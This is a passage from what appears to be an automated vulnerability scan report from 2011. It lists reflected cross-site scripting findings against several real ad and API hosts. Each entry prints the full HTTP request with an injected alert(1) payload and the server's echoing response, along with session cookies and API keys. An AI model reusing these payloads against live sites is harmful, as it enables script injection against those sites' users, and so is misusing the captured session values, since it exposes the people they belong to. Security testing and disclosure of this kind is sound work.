Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88527-2151-4

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 707c4'%3balert(1)//6d6a9985586 was submitted in the mpvc parameter. This input was echoed as 707c4';alert(1)//6d6a9985586 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/js/13966-88527-2151-4?mpt=2170444&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/a%3B234423004%3B0-0%3B1%3B20580498%3B4307-300/250%3B40033801/40051588/1%3B%3B%7Eokv%3D%3Bad%3Dbb%3Bsz%3D300x250%3Bpos%3Dinline_bb%3Bpoe%3Dyes%3Borbit%3Dy%3Bdel%3Diframe%3Bfromrss%3Dn%3Brss%3Dn%3Bheavy%3Dy%3Bpage%3Darticle%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f707c4'%3balert(1)//6d6a9985586 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=13966:2151/14302:28901/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 463
Date: Mon, 14 Feb 2011 01:38:26 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/3/0/*/a;234423004;0-0;1;20580498;4307-300/250;40033801/40051588/1;;~okv=;ad=bb;sz=300x250;pos=inline_bb;poe=yes;orbit=y;del=iframe;fromrss=n;rss=n;heavy=y;page=article;~aopt=6/0/ff/0;~sscs=?707c4';alert(1)//6d6a9985586http://altfarm.mediaplex.com/ad/ck/13966-88527-2151-4?mpt=2170444">
...[SNIP]...

1.73. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-4 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88527-2151-4

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58cba'%3balert(1)//d36ec453a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 58cba';alert(1)//d36ec453a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/js/13966-88527-2151-4?mpt=2170444&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/a%3B234423004%3B0-0%3B1%3B20580498%3B4307-300/250%3B40033801/40051588/1%3B%3B%7Eokv%3D%3Bad%3Dbb%3Bsz%3D300x250%3Bpos%3Dinline_bb%3Bpoe%3Dyes%3Borbit%3Dy%3Bdel%3Diframe%3Bfromrss%3Dn%3Brss%3Dn%3Bheavy%3Dy%3Bpage%3Darticle%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f&58cba'%3balert(1)//d36ec453a8=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=13966:2151/14302:28901/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 465
Date: Mon, 14 Feb 2011 01:38:27 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/3/0/*/a;234423004;0-0;1;20580498;4307-300/250;40033801/40051588/1;;~okv=;ad=bb;sz=300x250;pos=inline_bb;poe=yes;orbit=y;del=iframe;fromrss=n;rss=n;heavy=y;page=article;~aopt=6/0/ff/0;~sscs=?&58cba';alert(1)//d36ec453a8=1http://altfarm.mediaplex.com/ad/ck/13966-88527-2151-4?mpt=2170444">
...[SNIP]...

1.74. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-6 [mpt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88527-2151-6

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bbeaf'-alert(1)-'9307f7dd42 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/js/13966-88527-2151-6?mpt=2157694bbeaf'-alert(1)-'9307f7dd42&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/u%3B234423007%3B0-0%3B1%3B3619820%3B10408-336/850%3B40033784/40051571/1%3B%3B%7Eokv%3D%3Bad%3Dss%3Bad%3Dbb%3Bad%3Dhp%3Bsz%3D160x600%2C300x250%2C336x850%3Bpos%3Dad6%3Bpoe%3Dyes%3Borbit%3Dy%3Bdel%3Djs%3Bfromrss%3Dn%3Brss%3Dn%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Set-Cookie: mojo3=13966:2151/14302:28901/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113; expires=Wed, 13-Feb-2013 5:55:16 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 457
Date: Mon, 14 Feb 2011 01:37:39 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/3/0/*/u;234423007;0-0;1;3619820;10408-336/850;40033784/40051571/1;;~okv=;ad=ss;ad=bb;ad=hp;sz=160x600,300x250,336x850;pos=ad6;poe=yes;orbit=y;del=js;fromrss=n;rss=n;~aopt=6/0/ff/0;~sscs=?http://altfarm.mediaplex.com/ad/ck/13966-88527-2151-6?mpt=2157694bbeaf'-alert(1)-'9307f7dd42">
...[SNIP]...

1.75. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-6 [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88527-2151-6

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 712dc'%3balert(1)//23d3264674b was submitted in the mpvc parameter. This input was echoed as 712dc';alert(1)//23d3264674b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/js/13966-88527-2151-6?mpt=2157694&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/u%3B234423007%3B0-0%3B1%3B3619820%3B10408-336/850%3B40033784/40051571/1%3B%3B%7Eokv%3D%3Bad%3Dss%3Bad%3Dbb%3Bad%3Dhp%3Bsz%3D160x600%2C300x250%2C336x850%3Bpos%3Dad6%3Bpoe%3Dyes%3Borbit%3Dy%3Bdel%3Djs%3Bfromrss%3Dn%3Brss%3Dn%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f712dc'%3balert(1)//23d3264674b HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Set-Cookie: mojo3=13966:2151/14302:28901/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113; expires=Wed, 13-Feb-2013 5:55:16 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 455
Date: Mon, 14 Feb 2011 01:37:42 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/3/0/*/u;234423007;0-0;1;3619820;10408-336/850;40033784/40051571/1;;~okv=;ad=ss;ad=bb;ad=hp;sz=160x600,300x250,336x850;pos=ad6;poe=yes;orbit=y;del=js;fromrss=n;rss=n;~aopt=6/0/ff/0;~sscs=?712dc';alert(1)//23d3264674bhttp://altfarm.mediaplex.com/ad/ck/13966-88527-2151-6?mpt=2157694">
...[SNIP]...

1.76. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-6 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88527-2151-6

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4bde'%3balert(1)//6d86e68f733 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f4bde';alert(1)//6d86e68f733 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/js/13966-88527-2151-6?mpt=2157694&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/u%3B234423007%3B0-0%3B1%3B3619820%3B10408-336/850%3B40033784/40051571/1%3B%3B%7Eokv%3D%3Bad%3Dss%3Bad%3Dbb%3Bad%3Dhp%3Bsz%3D160x600%2C300x250%2C336x850%3Bpos%3Dad6%3Bpoe%3Dyes%3Borbit%3Dy%3Bdel%3Djs%3Bfromrss%3Dn%3Brss%3Dn%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f&f4bde'%3balert(1)//6d86e68f733=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Set-Cookie: mojo3=13966:2151/14302:28901/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113; expires=Wed, 13-Feb-2013 5:55:16 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 458
Date: Mon, 14 Feb 2011 01:37:45 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/3/0/*/u;234423007;0-0;1;3619820;10408-336/850;40033784/40051571/1;;~okv=;ad=ss;ad=bb;ad=hp;sz=160x600,300x250,336x850;pos=ad6;poe=yes;orbit=y;del=js;fromrss=n;rss=n;~aopt=6/0/ff/0;~sscs=?&f4bde';alert(1)//6d86e68f733=1http://altfarm.mediaplex.com/ad/ck/13966-88527-2151-6?mpt=2157694">
...[SNIP]...

1.77. http://api.bizographics.com/v1/profile.json [&callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the &callback request parameter is copied into the HTML document as plain text between tags. The payload b93bd<script>alert(1)</script>a6d294015c8 was submitted in the &callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoDatab93bd<script>alert(1)</script>a6d294015c8&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2400_NewsReel.html?baseDocId=SB10001424052748704329104576138271281667798
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KXTjLwm8dPXkaj5XcunNcMDa7Re6IGD4lLFy3bMisHmNbAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRCZ1UAhIHgQp0s9VPhT38SEVUJBxdqAyDQmBis3kUIRCUjpBQhSgJ05dWzEQqSCDqAipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Mon, 14 Feb 2011 01:36:39 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7Kb8iiqRrrqiiplaj5XcunNcMDa7Re6IGD4lBFocpwBNElwAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtSkshqfjmnjnFGDBYisbP9XVEVUJBxdqAyA0iimflEzxWuEyFjlqKSSPxZXQiiFVMClmMipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 219
Connection: keep-alive

dj.module.ad.bio.loadBizoDatab93bd<script>alert(1)</script>a6d294015c8({"bizographics":{"industry":[{"code":"business_services","name":"Business Services"}],"location":{"code":"texas","name":"USA - Texas"}},"usage":1});

1.78. http://api.bizographics.com/v1/profile.json [api_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 36839<script>alert(1)</script>f9aaf154604 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun36839<script>alert(1)</script>f9aaf154604 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2400_NewsReel.html?baseDocId=SB10001424052748704329104576138271281667798
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KXTjLwm8dPXkaj5XcunNcMDa7Re6IGD4lLFy3bMisHmNbAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRCZ1UAhIHgQp0s9VPhT38SEVUJBxdqAyDQmBis3kUIRCUjpBQhSgJ05dWzEQqSCDqAipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 14 Feb 2011 01:36:41 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 84
Connection: keep-alive

Unknown API key: (r9t72482usanbp6sphprhvun36839<script>alert(1)</script>f9aaf154604)

1.79. http://api.dimestore.com/viapi [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.dimestore.com
Path:   /viapi

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 60c4a<a>9e2f8f9272e was submitted in the id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /viapi?action=pixel&id=64105156860c4a<a>9e2f8f9272e HTTP/1.1
Host: api.dimestore.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=794;c=529/16;s=5;d=9;w=300;h=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: respondentId=ec3090ffba90412a8149082ce035a177; respondentEmail=""; IgUsFjsrORc3NyILDBo6HychGw%3D%3D=EyADRWJEY0NpdVl%2BSWFG; Mlo9CTINKhomHCQJNys5Fzc3Igs%3D=dkd8VQ%3D%3D; Mlo9CTINKhomHCQJNysrEzEh=EwwpRRURLVJ1dkl%2FVWJFb0Nyfl1%2BX2BGbzUIEEJ9UGBEb1oMKg0kBHMnOxMrIAg%2FAXMgJh8gbQ%3D%3D%0A; IBogOiIBKgExLQYjCzIdPRcaNwEiEj0rfkJ2c1E%3D=dQ%3D%3D; pixel_681051260=1; pixel_7668dede487ec485)(sn=*=1; pixel_a11059176=1

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Mon, 14 Feb 2011 01:37:25 GMT
Content-Type: text/xml
Connection: keep-alive
Set-Cookie: pixel_64105156860c4a<a>9e2f8f9272e=1; Expires=Tue, 14-Feb-2012 01:37:25 GMT
Content-Length: 55

// DIMESTORE PIXEL OK -- 64105156860c4a<a>9e2f8f9272e

1.80. http://api.echoenabled.com/v1/search [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.echoenabled.com
Path:   /v1/search

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload befc2<a>168ce8e9d57 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /v1/search?callback=jsonp1297694123476&q=childrenof%3Ahttp%3A%2F%2Fwww.aboutecho.com%2Fe2%2Ftweets%2Fe2launch+user.id%3Awww.twitter.com%2Fchrissaad%2Cwww.twitter.com%2Fcailloux2007%2Cwww.twitter.com%2Fwadcom%2Cwww.twitter.com%2Flevwalkin%2Cwww.twitter.com%2Fechoenabled%2Cwww.twitter.com%2Fechostatus%2Cwww.twitter.com%2Fkhrisloux+tags%3Aecho+-state%3ASystemFlagged%2CModeratorDeleted+children+-state%3ASystemFlagged%2CModeratorDeleted+sortOrder%3AreverseChronological+itemsPerPage%3A4+sanitizeHTML%3Afalse+befc2<a>168ce8e9d57&appkey=prod.echocorp HTTP/1.1
Host: api.echoenabled.com
Proxy-Connection: keep-alive
Referer: http://aboutecho.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Server: Yaws/1.85 Yet Another Web Server
Date: Mon, 14 Feb 2011 14:34:44 GMT
Content-Length: 139
Content-Type: application/x-javascript; charset="utf-8"

jsonp1297694123476({ "result": "error", "errorCode": "wrong_query", "errorMessage": "Parse error near: \"befc2<a>168ce8e9d57\" at 424" });

1.81. http://api.facebook.com/restserver.php [method parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The value of the method request parameter is copied into the HTML document as plain text between tags. The payload 51f5d<img%20src%3da%20onerror%3dalert(1)>50bd65752c8 was submitted in the method parameter. This input was echoed as 51f5d<img src=a onerror=alert(1)>50bd65752c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restserver.php?v=1.0&method=links.getStats51f5d<img%20src%3da%20onerror%3dalert(1)>50bd65752c8&urls=%5B%22http%3A%2F%2Fwww.legacy.com%2Flegacies%2F2011%2Fobituary-photo-gallery.aspx%3Fphoto%3Dbetty-garrette96f0%2522style%253d%2522x%253aexpression(alert(1))%2522520eb12a7af%26pid%3D148615818%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/legacies/2011/obituary-photo-gallery.aspx?photo=betty-garrette96f0%22style%3d%22x%3aexpression(alert(1))%22520eb12a7af&pid=148615818
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dexaminer.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.examiner.com%252Fnational%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: text/javascript;charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Cnection: close
Date: Mon, 14 Feb 2011 01:29:50 GMT
Content-Length: 466

fb_sharepro_render({"error_code":3,"error_msg":"Unknown method","request_args":[{"key":"v","value":"1.0"},{"key":"method","value":"links.getStats51f5d<img src=a onerror=alert(1)>50bd65752c8"},{"key":"urls","value":"[\"http:\/\/www.legacy.com\/legacies\/2011\/obituary-photo-gallery.aspx?photo=betty-garrette96f0%22style%3d%22x%3aexpression(alert(1))%22520eb12a7af&pid=148615818\"]"},{"key":
...[SNIP]...

1.82. http://api.facebook.com/restserver.php [method parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The value of the method request parameter is copied into the HTML document as plain text between tags. The payload 1ca06<img%20src%3da%20onerror%3dalert(1)>7fc4ebab431e57952 was submitted in the method parameter. This input was echoed as 1ca06<img src=a onerror=alert(1)>7fc4ebab431e57952 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /restserver.php?method=fql.query&query=SELECT%20name%2Cpic_small%2Cuid%20from%20user%20WHERE%20uid%20IN%20(1292387673)&method=fql.query1ca06<img%20src%3da%20onerror%3dalert(1)>7fc4ebab431e57952&api_key=54cc5dbde0acea15cbf544d4e434acc0&format=JSON&call_id=599&v=1.0 HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/Y7YCBKX-HZn.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dexaminer.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.examiner.com%252Fnational%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: application/json
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Cnection: close
Date: Mon, 14 Feb 2011 01:38:38 GMT
Content-Length: 388

{"error_code":3,"error_msg":"Unknown method","request_args":[{"key":"method","value":"fql.query1ca06<img src=a onerror=alert(1)>7fc4ebab431e57952"},{"key":"query","value":"SELECT name,pic_small,uid from user WHERE uid IN (1292387673)"},{"key":"api_key","value":"54cc5dbde0acea15cbf544d4e434acc0"},{"key":"format","value":"JSON"},{"key":"call_id",
...[SNIP]...

1.83. http://api.facebook.com/restserver.php [query parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The value of the query request parameter is copied into the HTML document as plain text between tags. The payload d807b<img%20src%3da%20onerror%3dalert(1)>86106d539e46377d1 was submitted in the query parameter. This input was echoed as d807b<img src=a onerror=alert(1)>86106d539e46377d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /restserver.php?method=fql.query&query=SELECT%20name%2Cpic_small%2Cuid%20from%20user%20WHERE%20uid%20IN%20(1292387673)d807b<img%20src%3da%20onerror%3dalert(1)>86106d539e46377d1&method=fql.query&api_key=54cc5dbde0acea15cbf544d4e434acc0&format=JSON&call_id=599&v=1.0 HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/Y7YCBKX-HZn.swf
Accept: */*
